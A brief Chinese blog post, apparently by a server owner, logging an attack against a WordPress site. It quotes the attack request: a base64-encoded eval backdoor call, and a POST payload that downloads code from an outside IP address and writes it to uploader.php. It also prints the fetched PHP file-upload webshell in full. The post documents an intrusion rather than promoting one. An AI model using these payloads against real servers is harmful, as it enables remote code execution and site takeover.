服务器天他被扫入侵方式也是五花八门
时间 :
2023-08-09
编辑 :创始人
类型 POST 过滤器 post
URI地址
//wp-admin/css/colors/blue/blue.php?wall=ZWNobyBhRHJpdjQ7ZXZhbCgkX1BPU1RbJ3Z6J10pOw==
传入值
vz:$x=fwrite(fopen($_SERVER[‘DOCUMENT_ROOT‘].‘/wp-admin/css/colors/blue/uploader.php‘,‘w+‘),file_get_contents(‘http://51.79.124.111/vz.txt‘));echo "aDriv4".$x;
打开看vz.txt的内容是
aDriv4-Priv8 TOOL<?php echo '<pre>'.php_uname()."\n".'<br/><form method="post" enctype="multipart/form-data"><input type="file" name="__"><input name="_" type="submit" value="Upload"></form>';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'OK';}else{echo 'ER';}}?>
